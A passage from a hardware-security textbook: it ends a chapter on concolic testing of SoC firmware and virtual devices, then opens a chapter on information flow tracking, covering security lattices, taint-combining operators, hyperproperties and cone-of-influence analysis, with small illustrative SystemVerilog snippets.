Symbolic values of user inputs to stimulus generated the least number of test
cases and triggered the least number of assertions since they crosscut the entire
SoC stack and accumulate complete constraints of the SoC execution. Following the
strictest constraints also makes all generated test cases valid to the entire SoC and
hence does not introduce false alarms. Behind the only assertion failure triggered by
the test cases of application inputs, a bug in the FW is discovered. Although this bug
is handcrafted, it demonstrates that the framework can precisely explore the impact
of user inputs to the top level of the host SW stack across the entire SoC HW/SW
stack. It generated an exact test case that pinpoints the FW buggy path from the user
inputs to the host SW.
Symbolic values of driver/VD interfaces generated the largest number of test
cases and triggered the largest number of assertions, while having a much higher
false-alarm rate on the triggered assertions. By following partial constraints of the
SoC stack, it is easier to explore the partial stack more thoroughly, but this also
produces test cases that might be invalid for the entire SoC stack. Manual effort is
needed to review all the
triggered assertions. In the experiment, there are seven triggered assertions in total
where three of them are real alarms and report real bugs. Besides the handcrafted
FW bug, two bugs from the E1000 VD in QEMU are detected by the approach. One is
reported by assertion P3 as shown in Fig. 10, and both concern functionalities
that are required according to the Intel E1000 Manual but are not implemented
in QEMU’s E1000 VD. Moreover, as the FW is written by the authors and has only basic
logic, the test cases and triggered assertions from the VD/FW interface are far fewer
than those from the driver/VD interface.
Conclusions
References
Alam T, Yang Z, Chen B, Armour N, Ray S (2022) Firver: concolic testing for systematic validation
of firmware binaries. In: 27th Asia and South Pacific design automation conference, ASP-DAC
2022, Taipei, 17–20 Jan 2022. IEEE, pp 352–357
Avgerinos T, Rebert A, Cha SK, Brumley D (2014a) Enhancing symbolic execution with
veritesting. In: 36th international conference on software engineering, ICSE’14, Hyderabad,
pp 1083–1094
Avgerinos T, Cha SK, Rebert A, Schwartz EJ, Woo M, Brumley D (2014b) Automatic exploit
generation. Commun ACM 57(2):74–84
Bai JJ, Wang YP, Yin J, Hu SM (2016) Testing error handling code in device drivers using
characteristic fault injection. In: Proceedings of the 2016 USENIX conference on Usenix annual
technical conference, USENIX ATC’16, Berkeley. USENIX Association, pp 635–647
Baldoni R, Coppa E, D’Elia DC, Demetrescu C, Finocchi I (2018) A survey of symbolic execution
techniques. ACM Comput Surv 51(3):50:1–50:39
Bessey A, Block K, Chelf B, Chou A, Fulton B, Hallem S, Henri-Gros C, Kamsky A, McPeak S,
Engler D (2010) A few billion lines of code later: using static analysis to find bugs in the real
world. Commun ACM 53(2):66–75
Kannavara R, Havlicek CJ, Chen B, Tuttle MR, Cong K, Ray S, Xie F (2015) Challenges and
opportunities with concolic testing. In: 2015 national aerospace and electronics conference
(NAECON), pp 374–378
Kasikci B, Zamfir C, Candea G (2015) Automated classification of data races under both strong
and weak memory models. ACM Trans Program Lang Syst 37(3):8:1–8:44
King JC (1976) Symbolic execution and program testing. Commun ACM 19(7):385–394
Kurshan RP, Levin V, Minea M, Peled D, Yenigün H (2002) Combining software and hardware
verification techniques. Formal Methods Syst Des (FMSD) 21(3):251–280
Kuznetsov V, Kinder J, Bucur S, Candea G (2012) Efficient state merging in symbolic execution.
In: Proceedings of the 33rd ACM SIGPLAN conference on programming language design and
implementation, PLDI’12, New York. ACM, pp 193–204
Lattner C, Adve V (2004) LLVM: a compilation framework for lifelong program analysis
& transformation. In: Proceedings of the international symposium on code generation and
optimization: feedback-directed and runtime optimization, CGO’04, Washington, DC. IEEE
Computer Society, p 75
Lei L, Cong K, Yang Z, Chen B, Xie F (2019) Hardware/software co-monitoring. In: CoRR,
arXiv:1905.03915 [cs.SE]
Li Z, Chen B, Feng W, Xie F (2021) Concolic execution of nmap scripts for honeyfarm generation.
In: Jaeger T, Qian Z (eds) MTD@CCS 2021: proceedings of the 8th ACM workshop on moving
target defense, virtual event, Republic of Korea, 15 Nov 2021. ACM, pp 33–42
Luk CK, Cohn R, Muth R, Patil H, Klauser A, Lowney G, Wallace S, Reddi VJ, Hazelwood K
(2005) Pin: building customized program analysis tools with dynamic instrumentation. In:
Proceedings of the 2005 ACM SIGPLAN conference on programming language design and
implementation, PLDI’05, New York. ACM, pp 190–200
Lyu Y, Mishra P (2021) Scalable concolic testing of RTL models. IEEE Trans Comput 70(7):979–
991
Marinescu PD, Cadar C (2012) Make test-zesti: a symbolic execution solution for improving
regression testing. In: Proceedings of the 34th international conference on software engineering,
ICSE’12, Piscataway. IEEE Press, pp 716–726
Mukherjee R, Purandare M, Polig R, Kroening D (2017) Formal techniques for effective co-
verification of hardware/software co-designs. In: Proceedings of the 54th annual design
automation conference, DAC 2017, Austin
Nethercote N, Seward J (2007) Valgrind: a framework for heavyweight dynamic binary
instrumentation. In: Proceedings of the 28th ACM SIGPLAN conference on programming
language design and implementation, PLDI’07, New York. ACM, pp 89–100
Palikareva H, Cadar C (2013) Multi-solver support in symbolic execution. In: Proceedings of the
25th international conference on computer aided verification, CAV’13. Springer, Berlin/Heidel-
berg, pp 53–68
Palikareva H, Kuchta T, Cadar C (2016) Shadow of a doubt: testing for divergences between
software versions. In: Proceedings of the 38th international conference on software engineering,
ICSE’16, New York. ACM, pp 1181–1192
Ramos DA, Engler D (2015) Under-constrained symbolic execution: correctness checking for
real code. In: Proceedings of the 24th USENIX conference on security symposium, SEC’15,
Berkeley. USENIX Association, pp 49–64
Redini N, Machiry A, Das D, Fratantonio Y, Bianchi A, Gustafson E, Shoshitaishvili Y, Kruegel C,
Vigna G (2017) Bootstomp: on the security of bootloaders in mobile devices. In: 26th USENIX
security symposium (USENIX security 17), Vancouver. USENIX Association, pp 781–798
Renzelmann MJ, Kadav A, Swift MM (2012) Symdrive: testing drivers without devices. In:
Proceedings of the 10th USENIX conference on operating systems design and implementation,
OSDI’12, Berkeley. USENIX Association, pp 279–292
Sen K, Marinov D, Agha G (2005) CUTE: a concolic unit testing engine for C. In: Proceedings
of the 10th European software engineering conference held jointly with 13th ACM SIGSOFT
international symposium on foundations of software engineering, ESEC/FSE-13, New York.
ACM, pp 263–272
Shoshitaishvili Y, Wang R, Salls C, Stephens N, Polino M, Dutcher A, Grosen J, Feng S, Hauser C,
Krügel C, Vigna G (2016) SOK: (state of) the art of war: offensive techniques in binary analysis.
In: IEEE symposium on security and privacy, SP’16. IEEE Computer Society, pp 138–157
Song D, Brumley D, Yin H, Caballero J, Jager I, Kang MG, Liang Z, Newsome J, Poosankam
P, Saxena P (2008) Bitblaze: a new approach to computer security via binary analysis. In:
Proceedings of the 4th international conference on information systems security, ICISS’08.
Springer, Berlin/Heidelberg, pp 1–25
Stephens N, Grosen J, Salls C, Dutcher A, Wang R, Corbetta J, Shoshitaishvili Y, Kruegel C, Vigna
G (2016) Driller: augmenting fuzzing through selective symbolic execution. In: Proceedings of
the network and distributed system security symposium, NDSS’16. The Internet Society
Stoenescu T, Stefanescu A, Predut S, Ipate F (2016) RIVER: a binary analysis framework using
symbolic execution and reversible x86 instructions. In: Fitzgerald JS, Heitmeyer CL, Gnesi S,
Philippou A (eds) FM 2016: formal methods – 21st international symposium, Limassol, 9–11
Nov 2016, Proceedings. Volume 9995 of Lecture notes in computer science, pp 779–785
The Guardian (2017) IT meltdown has cost British Airways $80m so far, says Willie
Walsh. https://www.theguardian.com/business/2017/jun/15/it-meltdown-cost-british-airlines-
80m-so-far-willie-walsh-iag
The New York Times (2018) Facebook security breach exposes accounts of 50 million users.
https://www.nytimes.com/2018/09/28/technology/facebook-hack-data-breach.html
Tianocore (2022) http://www.tianocore.org/
Tianocore (2022) EDK II. https://github.com/tianocore/edk2
Torvalds L (2005) Initial commit of linux kernel’s git repository. https://git.io/fjGug
Wong E, Zhang L, Wang S, Liu T, Tan L (2015) Dase: document-assisted symbolic execution for
improving automated software testing. In: Proceedings of the 37th international conference on
software engineering – Volume 1, ICSE’15, Piscataway. IEEE Press, pp 620–631
Zheng H, Li D, Liang B, Zeng X, Zheng W, Deng Y, Lam W, Yang W, Xie T (2017) Automated
test input generation for android: towards getting there in an industrial case. In: Proceedings
of the 39th international conference on software engineering: software engineering in practice
track, ICSE-SEIP’17, Piscataway. IEEE Press, pp 253–262
39 Information Flow Verification

Cynthia Sturton and Ryan Kastner
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1390
Information Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1391
Information Flow Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1391
Specifying Information Flow Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1395
Information Flow Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1396
Trace Properties and Hyperproperties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1398
Verifying Hyperproperties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1399
Verification Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1403
Simulation-Based Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1403
Formal Verification Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1404
Case Studies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1404
Cache Timing Side Channels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1405
Memory Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1408
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1410
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1410
Abstract
Information flow tracking (IFT) models the movement of data, which enables
verification of security properties related to integrity and confidentiality. This
chapter introduces the basics of hardware information flow analysis and illustrates
its use for hardware security verification. The chapter starts by describing
information flow models and properties. Then it highlights how information flow
properties can be analyzed and verified, surveys simulation-based and formal
verification tools, and demonstrates the approach in two case studies.
C. Sturton
University of North Carolina at Chapel Hill, Chapel Hill, NC, USA
e-mail: [email protected]
R. Kastner
University of California San Diego, La Jolla, CA, USA
e-mail: [email protected]
Introduction
An IFT property might state, for example, that secret information should not leak
into user memory space. An IFT property may also involve conditions, e.g., the key
cannot flow to the JTAG port except during debug
mode. Properties related to integrity and timing can be crafted in a similar manner
as described later in the chapter.
IFT verification involves understanding when, where, how, and why information
flows occur. IFT verification techniques range from formal methods to simulation,
emulation, and dynamic monitoring. Formal analysis provides guarantees on cor-
rectness and complete coverage but typically fails to scale past the level of IP cores.
Simulation allows for larger analysis across a system on chip. Emulation allows for
even more complex analysis involving software and OS interactions. Dynamic
monitoring performs real-time flow tracking.
This chapter serves as an introduction to the use of information flow
tracking for hardware security verification. The aim is to provide the necessary
background on information flow tracking models, properties, analysis, and verifi-
cation tools and then demonstrate how information flow tracking can be used in two
case studies related to cache timing leakage and on-chip access control.
Information Flow
Information Flow Model

An information flow model, following the classic Denning model, consists of
storage objects (e.g., registers and memory locations), a set of security classes SC,
a class combining operator ⊕, and a flow relation → that specifies when information
movement between security classes occurs. The flow relation defines the allowable
flows between every pair of security
classes. For example, one might first label registers that hold cryptographic key
material as “secret” and label ports as “public” and then further specify that
information should never flow from “secret” to “public” elements. In this way, one
can specify the flows that should and should not occur.
The security classes SC and their allowable flows → are key to using information
flow tracking to verify security properties. Assume that there are two security
classes: high and low (SC = {H, L}) and a flow relation L → H . The relation
indicates that it is allowable for information labeled as L to flow to storage objects
labeled as H. However, the opposite is not true: H ↛ L; high information should
never flow to storage objects with an L label. This simple lattice is shown in Fig. 1a.
While simple, this two-label lattice is quite powerful. Viewing the lattice in light
of integrity (Fig. 1b), the H label would be considered untrusted, and the L label is
trusted. In this case, one wants to ensure that untrusted information can never affect
a trusted storage object, i.e., untrusted ↛ trusted, which would violate the integrity
of the system. One can also view this same lattice through the lens of confidentiality
(Fig. 1c) where secret information should never be leaked to an unclassified or
openly viewable storage object.
Lattices can also be more complex. Figure 1d shows a lattice with eight different
security classes: {A, B, C}, {A, B}, {A, C}, {B, C}, {A}, {B}, {C}, and ∅. The
flow relation defines how information from three different categories, A, B, and
C, should be allowed to move throughout the system. A label of {A, B, C} indicates
that this storage object has information from all three categories, the label {A}
indicates the information only comes from A, the label {B, C} denotes the object
has information from both B and C, and so on. The flow relation depicted in this
lattice says that information from security class {A}, for example, is allowed to
flow to security class {A, B} and transitively to {A, B, C} but should never flow to
security class {B, C}. Lattices can be arbitrarily complex, although in practice the
vast majority of IFT tools default to a two-label lattice as shown in Fig. 1a, b, and c.
Fig. 1 A security lattice defines the flow relationships → between the different labels of a security
class SC . Part (a) defines a simple two-label {H, L} security class with allowable flow from low
L to high H . This same lattice can be used to define integrity (part b) and confidentiality (part c)
properties. More complex lattices are possible, e.g., part (d) shows a more complicated lattice that
uses 8 different labels to indicate the mixing of information between three entities A, B, and C.
Most hardware security IFT tools use a simple two-label lattice like those in parts (a), (b), and (c)
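To make the flow relation concrete, the following sketch (an illustration of these concepts, not code from any particular IFT tool) encodes the subset lattice of Fig. 1d in SystemVerilog. Each label is a 3-bit set over {A, B, C}, the class combining operator ⊕ is set union, and a flow is allowed exactly when the source label is a subset of the destination label:

// Illustrative label encoding (bit 2 = A, bit 1 = B, bit 0 = C; 3'b000 = Ø)
typedef logic [2:0] label_t;

// Class combining operator ⊕: the label of a result is the union of the
// labels of its operands.
function automatic label_t combine(label_t x, label_t y);
  return x | y;
endfunction

// Flow relation →: a flow from src to dst is allowed iff src ⊆ dst.
function automatic bit flow_allowed(label_t src, label_t dst);
  return (src & ~dst) == 3'b000;
endfunction

Under this encoding, a flow from {A} (3'b100) to {A, B} (3'b110) is allowed, while a flow from {A} to {B, C} (3'b011) is not, matching Fig. 1d; the two-label lattice of Fig. 1a is the one-bit special case.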
A key idea of information flow tracking is that storage objects have a security
class label in addition to their functional value. The label acts as an additional
piece of metadata that IFT verification tools use to determine properties related
to confidentiality, integrity, and availability.
IFT tools aim to provide some notion of tracking noninterference – an informa-
tion flow model with a strict flow relation (→) proposed by Goguen and Meseguer
(1982). In the noninterference model of information flow, any changes in high inputs
shall never be reflected in the low outputs. That is, low objects can learn nothing
about high information. Another way to think about this is that a noninterfering
computer system should produce the same low outputs for any set of low inputs
regardless of the functional values of the high inputs, i.e., it is impossible to learn
any information about the high values by controlling the low inputs and viewing
the low outputs. Equivalently, the computer system, projected on to a “low view,”
responds exactly the same to any input sequence of low values regardless of the high
values.
IFT determines how the labels propagate throughout the system by analyzing
the system behavior and updating the labels corresponding to the storage objects.
The IFT tool is given an initial labeling for the storage objects. Setting these initial
labels determines which objects are considered high and which are considered low
and therefore where information should and should not be allowed to flow. The
rules for determining how an object’s security class is updated are defined by the
class combining operator ⊕.
IFT tools implement the class combining operators ⊕ to track information flows
in different ways. The simplest and most conservative approach only considers the
labels and marks the output of any process P as H when at least one of its inputs
is H . In other words, the output of the process is labeled L only when all of the
inputs to the process have an L label. In this case, the class combining operator is an
OR gate. (This logic assumes that the label H = 1 and L = 0.) This is a safe
approach but can lead to false positives where data is labeled as H when it should
be L, i.e., the IFT tool states there is a flow when one does not exist.
The simple OR class combining operator is often too conservative and imprecise.
It can quickly lead to many storage objects being marked as H even if they
have no H information. To better understand the source of this imprecision,
consider a process that implements a binary two-input Boolean AND operation
as shown in Fig. 2. The inputs and outputs have their typical functional values
(0 or 1). Additionally, each input/output has an associated label (H or L). The class
combining operator is responsible for generating the output label. Part (a) shows the
case when both inputs have an L label. The output label will be L regardless of the
input’s functional value. Part (b) illustrates a similar situation when the inputs all
have an H label; the output will have an H label. More generally, if all inputs are
H (L), the outputs will be H (L), respectively. The operator becomes more complex
when one of the inputs is marked as H and the other input is L. Part (c) shows a
case when one of the inputs is labeled L and has a functional value of 1. The other
input has an H label. The results of the AND operation will be equal to the value of
H ’s functional value. Thus, there is information about H in the output – changing
Fig. 2 A simple process implementing a binary two-input Boolean AND operation. The two
inputs have the functional values (0/1) and the corresponding security class labels (H /L). The
output label is determined by the class combining operator. Part (a) shows an example when both
inputs have an L label. The output should be labeled L regardless of the functional values of
the inputs (denoted as *). Part (b) is similar where both inputs are H and the output label should
be marked as H . Parts (c) and (d) show more complex examples when the input labels are mixed.
Here the output labels depend on the functional values of the inputs. Part (d) shows the specific
scenario when an output can be labeled L even if one of the inputs has an H label
H will directly interfere with the output of the AND operation. Thus, the
output should be labeled H. Part (d) changes the functional value of the L input to
0. In this scenario, the output is always 0 regardless of the functional value of the H
input. That is, no information related to the H input propagates to the output; thus
the output can safely be labeled as L. Yet, the conservative approach would mark
the output as H , i.e., stating that there is a flow from H to L when there is not. More
complex combining operators consider the functional behavior of the process, the
functional values of the inputs to that process, and their labels.
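As a sketch (labels encoded as H = 1 and L = 0; signal names chosen for illustration), the conservative and the precise combining operators for the AND gate of Fig. 2 can be written as:

// Conservative operator: the output is H whenever any input is H.
assign O_label_cons = A_label | B_label;

// Precise operator: a tainted input can only affect O when the other
// input equals 1, so the case of Fig. 2d (an untainted 0 input) is
// correctly labeled L.
assign O_label_prec = (A_label & B_label)   // both inputs are H
                    | (A_label & B)         // A is H and B = 1 passes A through
                    | (B_label & A);        // B is H and A = 1 passes B through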
There are IFT models covering different types of flows – explicit and
implicit (Denning and Denning 1977), timing (Oberg et al. 2014), and
power (Nahiyan et al. 2020). This article focuses on explicit, implicit, and timing
flows, which relate to the security properties that are more commonly verified in
practice. The models differ on their security classes, class combining operator,
and flow relations. Most of the variation is due to the class combining operator,
e.g., determining explicit flows is generally much easier than determining implicit
flows, which is generally easier than modeling timing flows. The basic ideas behind
these different flows are described in the following. A hardware security verification
engineer does not necessarily need to comprehend all the details of how these flows
are modeled – that is the job of the IFT tool – but they do need a basic understanding
of the types of flows, as those are important when specifying information flow
properties.
Figure 3 shows a simple example that illustrates the difference between explicit
flows and implicit flows. The figure depicts a multiplexor as a process that has three
inputs A, B, and S and one output O. Each input and output are associated with
a storage object, e.g., a register/flip-flop. Explicit flows occur between the inputs
Fig. 3 A multiplexor exhibits explicit information flows between inputs A and B and the output
O. There is an implicit flow between the selector input S and the output O
A and B and the output O. In this case, the values from A or B are directly copied
into O. This means that O contains exact information about A and B, and thus O
should take on the label of the input that is copied. The input S is the select bit
which determines which of A or B to copy to the output O. There is an implicit
flow between S and O due to the fact that an attacker would be able to determine
information about the functional value of S by observing the functional values of O.
Implicit information flows are more subtle but are still capable of being exploited.
A timing flow is a scenario where information is transferred based upon the time
that a process takes to compute an output. A common timing flow occurs with caches.
An attacker will request some data from the cache. The data is returned quickly if it
is stored in the cache. When the data is not in the cache, it takes a longer amount of
time to fetch it from memory. The actual value of the data in both cases is the same,
but the time at which it is delivered is different. Thus, if the presence/absence of
that data in the cache was affected by another H process, e.g., the H process loads
data that evicts some other data, then the attacker can ascertain H information. This
is the core idea behind Spectre (Kocher et al. 2019), Meltdown (Lipp et al. 2018),
Foreshadow (Van Bulck et al. 2018), and other attacks that use the timing of cache
operations to extract secret information.
Specifying Information Flow Properties
Information flow properties are specified by setting storage object labels and
determining how those labels can and cannot flow throughout the system. Hardware
security verification starts by developing a threat model and determining the security
assets to protect (Aftabjahani et al. 2021). Assets are important system information
whose behaviors should be monitored. A cryptographic key is a prime example of a
security asset; a security verification engineer would want to understand how, when,
and where information related to the key can move throughout the system. This
is an example of a confidentiality property. Other examples of assets are control
registers. Control registers often dictate important security scenarios. For example, a
control register would be set in order to move the system into secure operating mode.
Another control register would be set to indicate debug mode. Understanding who
can set these control registers and the conditions under which they can be changed
is important for the secure operation of the system. In this integrity scenario, one
would want to understand when the trusted registers could be influenced by some
untrusted storage object.
To better understand how to use IFT for hardware security verification, consider
the control/status register (CSR) associated with setting secure operating mode (e.g.,
the Secure Configuration Register from TrustZone). This register stores important
information related to operating in a secure mode and is used to move into and out of
secure operating mode. Thus, it is important to protect the integrity of this register. In
this scenario one would mark common registers and memory space corresponding
to the nonsecure world as untrusted and the CSR as trusted. One would want to
determine if it is possible for the CSR label to ever become untrusted and, if it is, to
understand the scenarios in which this can occur. IFT verification tools provide this
ability.
IFT can also be used to understand security properties related to confidentiality.
Consider the case where one aims to understand the confidentiality of a crypto-
graphic key. IFT enables reasoning about how the value of a cryptographic key can
flow throughout a computer system. In this scenario, assume the key is stored in
a memory-mapped register associated with the custom IP core that performs the
cryptographic operations. The system would be initially labeled in the following
manner: the register that holds the key is labeled secret, and everything else in
the system is labeled unclassified. IFT tools can help determine which parts of the
system can learn information about the key. For example, can information related to
the key ever flow to the cache? IFT verification would taint the key and attempt to
ascertain the conditions under which a storage object related to the cache becomes
labeled as secret, i.e., information related to the key has been leaked into the cache.
Additionally, verification engineers often wish to specify strict “no flow” conditions.
For example, no information related to the key should ever leak into user space.
Here one would taint the key and use IFT to see if the physical memory locations
corresponding to the user space can ever be marked as secret. If they are, then there
is some information about the key in those tainted memory locations.
More generally speaking, labels are assigned depending on the security proper-
ties under verification. The labels can be broadly interpreted to define properties
related to confidentiality, integrity, and availability. At their most abstract, labels are
defined by the security classes. The rules for calculating the labels are defined by
the class combining operator. When combined with the flow relations, these define
the types of security properties that IFT can verify.
Information Flow Analysis
Fig. 4 A trace of execution can be used to confirm a simple assertion. (a) A simple AES module
with inputs key, data, and rst and output rdy. (b) An assertion, rst → ¬rdy, to capture
correct reset behavior. (c) A trace of execution demonstrating the desired behavior
Consider the simple AES module of Fig. 4a, with inputs key, data, and rst and
output rdy; when rdy is high, the ciphertext is valid and ready to be
read. The ciphertext output is never valid while the module is undergoing a reset
cycle, and the ready signal should reflect this. To test that the behavior of the ready
signal is correct in this regard, one might write the simple assertion, rst → ¬rdy
(Fig. 4b). Either traces of execution or a formal model of the design can then be
studied to see whether it is indeed the case that the ready signal is never high during
a reset cycle (Fig. 4c). Any trace-based verification technique can be used to either
find violations of this property or determine that the behavior of rdy is likely correct
because no violations are found (Because exhaustive state coverage is not feasible,
a trace-based technique will not prove correctness with respect to a property for any
but the simplest of designs. The most such a technique can verify is that no violations
were found.). Alternatively, a formal verification technique such as model checking
can be used to either find violations of the property or determine that no violations
can occur within the first N number of clock cycles of execution (The bound N is
an adjustable parameter to the verification tool.).
Another desirable property of the module is that information about the key should
not flow to the ready signal. It should be impossible to recover even one bit of
the key signal by studying the on-off behavior of the rdy signal. A variation in
time to compute can reveal information about the value of key when that variation
depends on the value of key. The behavior of rdy will reflect any such variation
and therefore will reveal information about the key. When that happens, the rdy
signal is said to leak information about key.
However, this property cannot be stated as a simple assertion in propositional
logic. Let’s say one wants to ensure that the value of the 0th bit of the key signal can
never flow to the rdy signal. Two naively written properties might be key0 → rdy
or key0 → ¬rdy. However, neither one expresses the desired property, and in
fact, both reflect acceptable behaviors of the design. It might be tempting to think
that adding temporal logic to the property will solve the problem. For example, a
property along the lines of key0 → X(rdy), which says that if the 0th bit of key
is set then in the next (X) clock cycle rdy must also be set, seems to solve one
problem with the naive properties, which is that information will surely take time
to flow through a design. But, it does not solve the deeper problem, which is that
there is no combination of values of key0 and rdy that is illegal. Rather, it is that
the value of rdy in a particular clock cycle should be the same whether key is set
or unset; the value of rdy should not depend on the value of key0 . But, in order
to get at this property, it is not enough to reason about a single trace of execution.
One needs to reason about traces in which key0 is set and traces in which key0
is unset. The property that is wanted is as follows: in all possible traces, whenever
all of the inputs other than key0 are fixed, the behavior of rdy will be fixed. In
other words, if data, rst, and key1 . . . keyn−1 are fixed to particular values,
the waveform of rdy will not vary, regardless of how key0 varies. This defines
noninterference between key0 and rdy – nothing about the value of key0 can be
learned by observing rdy.
First-order logic (often abbreviated FOL) can be used to express the desired
property that information should not flow from any of the bits of key. First-
order logic is more expressive than propositional logic and allows one to state a
notion of for all traces. First-order logic also allows one to introduce a notion of
equality between two registers. The desired property, formally written, might look
like this:

∀AES1, AES2 : (rst1 = rst2 ∧ data1 = data2) → (rdy1 = rdy2)    (1)
This property says that for any two traces produced by the AES module
(∀ AES1 , AES2 ), as long as rst has the same value in both traces and data has the
same value in both traces, rdy will also have the same value in both traces (Note
that one would probably like a stronger property saying that as long as rst carries
the same value in both traces, regardless of both data and key, rdy will carry
the same value in both traces.). The value of key does not affect the value of rdy.
In other words, information does not flow from key to rdy. For simplicity, timing
information has been elided; the true property would assert that the two rdy signals
always have the same value at all points in the trace.
The key idea that makes the above property sound is that it reasons about any
two possible traces. It is impossible to find two traces of the system in which rst
and data are held fixed and the behavior of rdy varies.
Trace Properties and Hyperproperties
The example property about how information flows, written formally in Eq. (1),
is fundamentally different than the example assertion about how signals behave,
shown in Fig. 4b. The latter is an example of a trace property. It is a property that can
be exhibited by a single trace of execution and can similarly be falsified by a single
trace of execution. The types of properties that are expressible as SystemVerilog
Assertions (SVA) are all trace properties. One usually thinks of these properties in
terms of their logic formulation (e.g., rst → ¬rdy), but another way to think
about them is as a set of execution traces: for example, the set of all traces in which
the statement rst → ¬rdy is valid. Using this definition in which a property is
a set of traces, the property is true of a system if all of the traces the system could
possibly produce are in the property’s trace set.
The properties about how information flows, on the other hand, are not trace
properties but rather hyperproperties (Clarkson and Schneider 2010). These
properties are described by sets of traces, rather than by individual traces. Similarly,
no single trace of execution can demonstrate a violation of a hyperproperty; only
a set of two or more traces can do that. If a trace property is defined as a set of
traces, then a hyperproperty is defined as a set of sets of traces, and every set
of traces within the set represents a possible system satisfying the hyperproperty.
Conversely, a hyperproperty is true of a system if all of the traces the system could
possibly produce form one of the sets in the set of sets of traces that defines the
hyperproperty. Hyperproperties can express notions of information flow. The AES
hyperproperty is one example. Noninterference, described in section “Information
Flow Model”, is another example, and determinism, which says that only the defined
inputs can affect the output (Roscoe 1995), is another. All of these information flow
hyperproperties are important for security. Hyperproperties can also express notions
of fairness, such as whether a coin flip has a non-biased outcome. However, this
chapter focuses on properties related to information flow.
Going forward, the term property will be used in a generic sense to mean the
behavior of the system. Where the distinction is important and not clear from the
context, the terms trace property and hyperproperty will be used.
Verifying Hyperproperties
A strong security verification effort will require verifying information flow proper-
ties – hyperproperties – of a design. However, because a hyperproperty is neither
satisfied nor falsified by any single trace of execution, the traditional verification
efforts will not work. It is not possible to express hyperproperties in standard
assertion specification languages such as SVA. But, even if it were possible – if the
specification language were updated to include for all quantifiers, for example –
the traditional verification approaches would not be able to determine whether such
a hyperproperty is valid of the design or not. Trace-based engines monitor the
signals of the design as simulation progresses and look for any violation of the given
assertion. The engine does not have knowledge of any prior or future simulation runs
and therefore cannot reason about the comparative behavior of two or more traces
of execution. Similarly, traditional model checking engines analyze the behavior of
a single instance of the design and therefore cannot reason about the comparative
behavior of two or more instances.
There are, however, new options for verifying information flow properties,
and they can be categorized by whether they use a static or dynamic analysis
technique. Under the static analysis category are cone-of-influence analysis and a
more sophisticated model checking technique (section “Static Analysis”). Under
the dynamic analysis category is information flow tracking (section “Dynamic
Analysis”). Each of these are discussed in the following.
Static Analysis
In static analysis the RTL description of the design is itself analyzed. The analysis
tool takes as input the RTL design, but rather than try to simulate the design, the
analysis tool parses the design to answer a particular question.
Cone-of-influence analysis. The simplest form of static analysis that can be used
to verify information flow properties is a cone-of-influence analysis. This analysis
finds every signal in the design that can possibly affect the behavior of a signal or
set of signals, and it is often used in the course of traditional verification to
simplify the verification problem. COI analysis can be used to provide some insight
into how information flows as follows. Suppose there is a design D with output
signal snk (for “sink”), and the verification goal is to identify which information
flows to this sink signal. First, a COI set is initialized to include the signal snk.
The analysis then identifies every signal s which appears on the right-hand side of
an assignment to snk in the RTL description of design D. Every newly identified
s is added to the COI set. The analysis then repeats, for every s newly added to the
COI set; every signal t which appears on the right-hand side of an assignment to s is
added to the COI set. The analysis continues to repeat until a steady state is reached
in which no new signals are added to the COI set. (As there are a finite number of
signals in the design, the analysis is guaranteed to terminate.)
Every signal in the COI set has the potential to be a source of information flow
to snk. This analysis is fast, requiring at most N iterations for a design with N
unique signals, and the resulting COI set is complete: every signal which acts as a
source of information flow to snk will be included in the COI set, or put another
way, any signal that is not included in the COI set definitely does not influence the
behavior of snk. However, the analysis is not sound: there may be signals included
in the COI set which can never be a source of information flow to snk. Furthermore,
the analysis paints only a broad-strokes picture of how information flows; details
about the path that information takes through the design, or the conditions under
which flows occur, cannot be obtained with this analysis.
To better understand the limitations of COI analysis, consider Fig. 5. In Fig. 5a,
an OR gate tied to 1 is connected to an AND gate. It is clear that while information
from B and C both flow to, and affect the behavior of, output O, no information is
flowing from A to O since the value of B is determined solely by the fixed input.
However, a COI analysis will not capture that fact and will include A in the COI
set of O. Figure 5b illustrates how details about which path information takes will
be lost by COI analysis. In the top circuit of Fig. 5b, information flowing from B
to O always passes through the XOR gate, while in the bottom circuit, information
can flow directly from B to O. COI analysis cannot make that distinction, and the
distinction is important for security. Suppose A is a one-bit secret key and B is a
one-bit message that should be kept private. If the key is generated at random and
without bias and is unknown to the observer at O, then the observer cannot learn
any information about the message B even though there is information flowing from
B to O: XORing the private message with the secret key obscures the information in
Fig. 5 Three circuits illustrating the limitations of COI analysis. (a) COI analysis would
determine that information can flow from A, B, and C to O. However, there is no possible
information flow from A to O. (b) In the top circuit, all information flowing from B to O always
passes through the XOR gate, whereas in the bottom circuit information can flow directly from B to
O. COI analysis cannot differentiate between these two flows. (c) COI analysis would determine
that information can flow from A, B, and S to O but would not determine the conditional nature of
the flows from A or B to O
the message. However, in the bottom circuit, the observer at O will be able to learn
information about B, for example, whenever the output at O is 1, the observer knows
that the message is also 1. These two circuits have wildly different security postures,
and in both cases, the analysis of information flow is important, but a COI analysis
